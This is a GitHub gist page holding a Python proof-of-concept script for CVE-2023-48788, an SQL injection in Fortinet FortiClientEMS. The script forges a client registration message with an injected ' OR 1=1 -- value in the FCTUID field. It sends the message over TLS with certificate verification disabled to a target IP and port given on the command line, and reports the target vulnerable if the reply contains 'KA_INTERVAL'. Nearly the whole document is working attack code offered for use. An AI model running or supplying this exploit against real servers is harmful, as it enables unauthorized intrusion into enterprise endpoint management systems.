Skip to content

Instantly share code, notes, and snippets.

@vncloudsco
Last active March 22, 2024 04:09
Show Gist options
  • Save vncloudsco/747c6148ab2ade00e8207197f7ddd2de to your computer and use it in GitHub Desktop.
Save vncloudsco/747c6148ab2ade00e8207197f7ddd2de to your computer and use it in GitHub Desktop.
CVE-2023-48788 is a SQLi vulnerability which leads to unauthenticated remote code executing in fortinet's FortiClientEMS.
import argparse
import socket
import ssl
REGISTER = (
"MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD{}\n"
+ "IP=127.0.0.1\n"
+ "MAC=00-50-56-11-22-33\n"
+ "FCT_ONNET=0\n"
+ "CAPS=32767\n"
+ "VDOM=default\n"
+ "EC_QUARANTINED=0\n"
+ "SIZE= {}\n"
+ "\n"
+ "X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjAzNDUKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9NTczMTUzMkItMkUyOC00OEYwLUFDQ0YtNDI4MEU0ODNFRTE0Ck5XSUZTPUV0aGVybmV0MHwxMC4wLjQwLjg1fDAwLTUwLTU2LTg0LTMzLWIyfDEwLjAuNDAuMjU0fGY0LTRlLTA1LTRmLTZjLTQ4fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTI2MTY1Njk4OTQtNDUzOTU0ODcxLTE0NTg4MDY4Mi01MDAKR1JPVVBfVEFHPQpBREdVSUQ9CkVQX0ZHVENIS1NVTT0wCkVQX1JVTEVDSEtTVU09MApXRl9GSUxFU0NIS1NVTT0wCkVQX0FQUENUUkxDSEtTVU09MAo=\n"
+ "X-FCCK-REGISTER-END"
+ "\r\n"
+ "\r\n"
)
SQLI = "' OR 1=1 --"
def send_message(target, port):
sqli = SQLI
msg_len = len(REGISTER + sqli)
msg = REGISTER.format(sqli, msg_len)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5.0)
addr = (target, int(port))
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
secure_socket = context.wrap_socket(s, server_hostname="asdf")
secure_socket.connect(addr)
secure_socket.send(msg.encode())
print(f"[+] Sent Message!\n{msg}")
response = secure_socket.recv(1024)
print(response)
if response and "KA_INTERVAL" in response.decode():
print("[+] The target is vulnerable!")
else:
print("[-] The target is not vulnerable!")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-t",
"--target",
help="The Fortinet Endpoint Managment Server target IP address",
required=True,
)
parser.add_argument(
"-p",
"--port",
help="The Fortinet Endpoint Managment Server target port",
required=True,
)
args = parser.parse_args()
send_message(args.target, args.port)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment